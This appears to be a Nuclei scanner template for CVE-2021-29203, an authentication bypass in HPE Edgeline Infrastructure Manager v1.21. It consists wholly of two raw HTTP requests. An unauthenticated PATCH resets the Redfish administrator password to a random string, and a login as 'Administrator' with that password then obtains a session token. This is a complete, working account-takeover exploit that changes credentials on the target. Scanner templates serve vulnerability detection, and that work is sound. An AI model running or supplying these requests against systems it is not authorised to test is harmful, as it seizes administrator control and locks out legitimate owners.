id: CVE-2021-29203 info: name: HPE Edgeline Infrastructure Manager v1.21 Authentication Bypass author: madrobot severity: critical tags: hpe,cve,cve2021,bypass reference: | - https://www.tenable.com/security/research/tra-2021-15 - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 requests: - raw: - | PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1 Host: {{Hostname}} Accept-Language: en Accept: */* Content-Length: 23 Content-Type: application/json Connection: close {"Password":"{{randstr}}"} - | POST /redfish/v1/SessionService/Sessions/ HTTP/1.1 Host: {{Hostname}} Accept-Language: en Content-Length: 50 Content-Type: application/json Connection: close {"UserName":"Administrator","Password":"{{randstr}}"} matchers-condition: and matchers: - type: status status: - 201 - type: word condition: and part: header words: - "X-Auth-Token" - "PasswordReset" - "Location" - type: word part: body words: - "Base.1.0.Created"